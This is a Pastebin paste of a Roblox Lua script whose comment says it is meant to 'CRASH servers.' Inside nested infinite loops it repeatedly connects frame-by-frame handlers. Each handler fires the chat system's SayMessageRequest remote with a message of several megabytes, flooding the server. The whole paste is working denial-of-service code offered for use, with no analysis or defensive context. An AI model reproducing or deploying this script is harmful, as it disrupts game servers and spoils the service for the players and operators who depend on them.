Palazikaka

Untitled

Jan 2nd, 2020
180
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.41 KB | None | 0 0
  1. --script edited by settings#2006 to CRASH servers.
  2. while true do
  3. wait()
  4. while true do
  5. wait()
  6. for i=1, 100 do
  7. local msg = "/e "..string.rep("do the same with this put whatever you want. ",301056)
  8. game:GetService("RunService").RenderStepped:Connect(function()
  9. game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(msg,"All")
  10. end)
  11. end
  12. end
  13. end
Advertisement
Add Comment
Please, Sign In to add comment